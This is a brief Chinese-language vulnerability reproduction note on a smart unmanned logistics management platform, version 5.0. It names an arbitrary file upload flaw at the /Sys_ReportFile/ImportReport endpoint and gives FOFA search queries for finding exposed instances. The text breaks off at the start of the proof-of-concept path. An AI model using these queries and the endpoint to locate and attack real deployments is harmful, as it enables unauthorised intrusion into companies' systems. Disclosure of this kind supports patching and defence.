简介
智能物流无人值守是针对流程生产企业原料采购、产成品销售及厂内物流的统一管控智能信息化平台。 目的:全企业产供销业务的集成管理,无人值守计量、降本增效、机器替代人工,优化物流资源管控体系。
该系统5.0版本/Sys_ReportFile/ImportReport接口处存在任意文件上传漏洞
漏洞复现
FOFA语法:
"智能物流无人值守系统"
或者
web.body="智能物流无人值守系统"
访问界面如下所示:
POC:/Sys_ReportFile/ImportReport?enco